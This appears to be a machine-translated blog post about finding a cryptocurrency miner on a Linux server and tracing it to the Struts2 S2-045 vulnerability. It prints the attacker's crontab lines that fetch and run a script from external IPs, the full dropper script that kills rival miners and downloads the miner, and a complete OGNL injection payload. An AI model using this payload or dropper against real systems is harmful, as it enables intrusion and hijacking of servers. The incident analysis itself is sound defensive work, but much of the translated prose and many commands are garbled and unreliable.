The introduction

There are still many people in the world. In 2011, a junior student was troubled. Then zhihu posted a question asking if there are any good financial investment suggestions for junior students with 6000 yuan in hand. On This day in 2017, there was a popular question on Zhihu, because there was an answer under the question that received tens of thousands of likes. Buy “Bitcoin, save your wallet file, forget you ever had 6000 yuan, and check back in five years.

The cause of

I is a server and Linux server or a network, the outside forces day qing han horse firewall, internal have a firewall, a powerful combination, even himself can’t remember exactly how figures, these years I was carefree, leisurely feel a little bit about, however, is just such an otherwise I was relentless attacks.

That morning, my brain felt a little feverish, and I hastened to issue a top command:

Top-20:07:49 Up 70 days, 8:53, 2 Users, Load Average: 5.71, 5.07, 2.93 Tasks: 200 total, 1 running, 199 sleeping, 0 stopped, 0 zombie %Cpu(s): 50.2US, 0.1sy, 0.0Ni, 49.7id, 0.0wa, 0.0hi, 0.0Si, 0.0st KiB Mem: 65401524 total, 36266252 free, 13198040 used, 15937232 buff/cache KiB Swap: 32834556 total, 32803700 free, 30856 used. 51442368 avail Mem PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 17257 root 20 0 591340 15220 556 S 599.7 0.067:13.74 ATd 15768 root 20 0 15.369g 2.319g 18048s 1.7 3.7 4:10.49 JavaCopy the code

Found a strange process atd, CPU was nearly 600%, execute the command ps – eaf | grep atd:

[root@itstyle tmp]# ps -ef|grep atd
root     17257     1 99 19:56 ?        01:22:31 ./atd -c trtgsasefd.conf -t 6
root     17475 17165  0 20:10 pts/0    00:00:00 grep --color=auto atd
Copy the code

Then find / -name atd finds where the relevant instruction is stored.

[root@itstyle tmp]# find / -name atd
/var/tmp/atd
Copy the code

Kill -9 17257, kill the atD process immediately and forcibly.

Then the fever went down, but unfortunately, within a few minutes, it burned again, and atD was running again.

Kill and then run again, there must be timing somewhere, check the scheduled task, crontab -l:

[root@itstyle tmp]# crontab -l20 * * * * * / wget - O - q | http://5.188.87.11/icons/logo.jpg sh * * * * * / 19 curl http://5.188.87.11/icons/logo.jpg | shCopy the code

F12 image network request found that the following code actually exists in Response:

#! /bin/sh
rm -rf /var/tmp/bmsnxvpggm.conf
ps auxf|grep -v grep|grep -v trtgsasefd|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\. /"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "bmsnxvpggm"|awk '{print $2}'|xargs kill -9
ps -fe|grep -e "trtgsasefd" -e "ixcnkupikm" -e "jmzaazwiom" -e "erlimkvsmb" -e "pdnpiqlnaa" -e "zhoimvmfqo"|grep -v grep
if[$?-ne0]then
echo "start process....."chmod 777 /var/tmp/trtgsasefd.conf rm -rf /var/tmp/trtgsasefd.conf curl -o /var/tmp/trtgsasefd.conf http://5.188.87.11/icons/kworker.conf wget - O/var/TMP/trtgsasefd. Conf chmod 777 at http://5.188.87.11/icons/kworker.conf /var/tmp/atd rm -rf /var/tmp/atd rm -rf /var/tmp/sshd cat /proc/cpuinfo|grep aes>/dev/nullif[$?-ne1]thenCurl -o/var/TMP/wget atd http://5.188.87.11/icons/kworker - o/var/TMP/atd http://5.188.87.11/icons/kworkerelseCurl -o/var/TMP/wget atd http://5.188.87.11/icons/kworker_na - o/var/TMP/atd http://5.188.87.11/icons/kworker_nafi
chmod +x /var/tmp/atd
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
nohup ./atd -c trtgsasefd.conf -t `echo $cores` >/dev/null &
else
echo "runing....."
fi
Copy the code

A pile of script, the motherfucker actually has RM-RF this is going to kill me!! Turn on the blue light, Google the command, and find the following instructions in Virustotal:

Also found was a comment from four days ago, which was a script to download and launch a Bitcode miner via Struts bug spread.

A chunk of code was also found in gov.LK, vaguely related to Struts2:

Since some of the older projects were still using Struts2, I checked the logs and found the rumored OGNL injection

org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/form-data stream, content type header is %{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess? (#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames( ).clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "20 * * * * * / wget - O - q | http://91.230.47.40/icons/logo.jpg sh \ n 19 * * * * * / curl http://91.230.47.40/icons/logo.jpg | sh"| crontab -; Wget - O - q | http://91.230.47.40/icons/logo.jpg sh').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin? {'cmd.exe', '/c',#cmd}:{'/bin/bash', '-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.Servlet ActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(# ros.flush())}Copy the code

The hacker used a form to send some content to struts request, which was parsed by OGNL, resulting in the creation of crontab.

Mining group

Struts2 security vulnerabilities have been revealed since 2010 with remote code execution vulnerabilities, From s2-005, S2-009, S2-013 s2-016, S2-019, S2-020, S2-032, S2-037, devMode in 2010, and the S045 vulnerability disclosed by Struts2 in early March 2017, Each outbreak was followed by a Struts2 scan attack on the Internet.

This attack targets the Struts2 remote command execution vulnerability, vulnerability number :S2-045, CVE number :CVE-2017-5638, officially rated as high risk. This vulnerability is caused by the use of file upload function based on Jakarta plug-in. Malicious users can trigger the vulnerability by modifying the content-Type value in the HTTP request header. Hackers launch mass attacks on WEB application servers on the Internet and download malicious scripts to execute bitcoin mining programs, mainly affecting Linux servers.

After detection and search, this should be an organized and disciplined mining group, the following is the SOURCE of IP address, evil Su Xiu doctrine ah, is really the heart of my heaven is not dead.

The solution

Struts2 update to 2.5.10, high-risk vulnerability again, this is a March update, then speculative or quickly upgrade, if you really don’t want to upgrade, it doesn’t matter anyway, it’s mining, won’t break you anything.

But what if we don’t mine? What if we don’t mine? When the time comes, the fever will not be so simple, many companies online deployment is not very standard, maybe all the programs start with root also maybe?

How to inject

Finally, I feel that this is the problem we are more concerned about, there must be many friends want to know how the hacker is injected?

If you want to view the hidden content of this post please reply

People say that as long as the heart is sincere enough, you can find a pawnshop on the west pimple mountain, go in, you can change your life, in fact, I do not know.

Author: Xiao Qi

Reference: https://blog.52itstyle.com

Sharing is a happy experience, and it also witnessed the personal growth process. Most of the articles are summary of work experience and daily learning accumulation. Based on my own cognitive deficiencies, I would like to ask you to correct me and make progress together.